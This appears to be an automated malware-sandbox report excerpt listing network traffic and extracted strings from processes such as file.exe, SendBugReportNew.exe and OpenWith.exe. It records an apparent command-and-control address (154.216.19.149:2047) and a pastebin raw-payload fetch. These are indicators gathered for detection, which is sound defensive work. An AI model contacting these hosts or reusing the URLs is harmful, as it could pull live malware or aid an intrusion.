                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.149
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218D4520 WSARecv,17_3_00007DF4218D4520
                      Source: global trafficHTTP traffic detected: GET /raw/jxfGm9Pc HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: time.windows.com
                      Source: global trafficDNS traffic detected: DNS query: pastebin.com
                      Source: SendBugReportNew.exe, 00000009.00000002.1404127146.0000000002D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c0rl.m%L
                      Source: SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                      Source: SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.1286758641.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.1286758641.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                      Source: file.exe, 00000007.00000003.1286758641.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                      Source: SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                      Source: SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.1286758641.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                      Source: file.exe, 00000007.00000003.1286758641.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.1286758641.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000002.1404127146.0000000002D49000.00000004.00000020.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.1286758641.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
                      Source: SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                      Source: SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                      Source: file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000000.1290343124.0000000000401000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                      Source: SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                      Source: SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                      Source: SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                      Source: SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E23000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.00000000050BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                      Source: SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                      Source: SendBugReportNew.exe, 00000009.00000002.1404127146.0000000002D49000.00000004.00000020.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                      Source: SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                      Source: SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                      Source: OpenWith.exe, OpenWith.exe, 00000011.00000003.1505283509.000001F6663DE000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1677547052.000001F6663D7000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1498738651.000001F6663DE000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1511247150.000001F6663E4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1495447075.000001F6663DE000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1501372188.000001F6663DE000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1504313864.000001F6663DE000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1494409589.000001F6663DE000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1496020851.000001F6663DE000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1496455071.000001F6663DE000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1494693265.000001F6663DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://154.216.19.149:2047/888260cc6af8f/07djb4gj.jifud
                      Source: OpenWith.exe, 0000000D.00000002.1394086131.00000000026EC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://154.216.19.149:2047/888260cc6af8f/07djb4gj.jifud(
                      Source: OpenWith.exe, 0000000D.00000003.1393605091.0000000004F54000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1393605091.0000000004F58000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000002.1394825096.0000000004F59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://154.216.19.149:2047/888260cc6af8f/07djb4gj.jifudkernelbasentdllkernel32GetProcessMitigationP
                      Source: OpenWith.exe, 00000011.00000003.1545991978.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1501094672.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1556366377.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1507797611.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1501856862.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1539955152.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1551283365.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1495610611.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1544923206.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1557954411.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1541801059.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1502193124.000001F666877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: OpenWith.exe, 00000011.00000003.1545991978.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1501094672.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1556366377.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1507797611.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1501856862.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1539955152.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1551283365.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1495610611.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1544923206.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1557954411.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1541801059.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1502193124.000001F666877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: OpenWith.exe, 00000011.00000003.1545991978.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1501094672.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1556366377.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1507797611.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1501856862.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1539955152.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1551283365.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1544923206.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1557954411.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1541801059.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1502193124.000001F666877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.sea
                      Source: OpenWith.exe, 00000011.00000003.1495610611.000001F666877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: OpenWith.exe, 00000011.00000003.1545991978.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1501094672.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1556366377.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1507797611.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1501856862.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1539955152.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1551283365.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1495610611.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1544923206.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1557954411.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1541801059.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1502193124.000001F666877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.1286758641.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: OpenWith.exe, 00000011.00000003.1505283509.000001F6663DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91
                      Source: OpenWith.exe, 00000011.00000003.1504313864.000001F6663DE000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1502338268.000001F66667B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                      Source: OpenWith.exe, 00000011.00000003.1504313864.000001F6663DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201691ad-216
                      Source: SendBugReportNew.exe, 00000009.00000002.1404127146.0000000002D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.c
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: OpenWith.exe, 00000011.00000003.1545991978.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1501094672.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1556366377.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1507797611.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1501856862.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1539955152.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1551283365.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1495610611.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1544923206.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1557954411.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1541801059.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1502193124.000001F666877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000000.1290343124.0000000000401000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.iobit.com/en/privacy.phpOpenU
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
